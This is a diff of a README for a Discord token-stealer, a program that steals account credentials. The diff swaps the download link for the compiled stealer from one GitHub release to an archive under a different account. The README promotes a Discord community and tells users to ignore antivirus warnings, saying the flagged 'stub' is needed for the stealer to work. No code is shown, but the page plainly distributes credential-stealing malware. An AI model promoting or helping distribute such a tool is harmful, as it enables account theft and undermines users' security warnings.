thereeroyz/stealer-token-grabber/README.md

 On Null Community [discord](https://discord.gg/qjrDprutvg).

 - How to use it?<br />
-You need to compile open source files or download released stable program from [here](https://github.com/Nyxonn/Discord-AIO/releases/download/0.6.3/Discord.AIO.exe) or discord above.
+You need to compile open source files or download released stable program from [here](https://github.com/kromosohn/discord-stealer-token-grabber/releases/download/Release/Release.rar).

 - Antivirus reports program as malicious!<br />
 Program contains the stub file which is necessary to make stealer work, it's all open source so if you are extremly scared check it by yourself.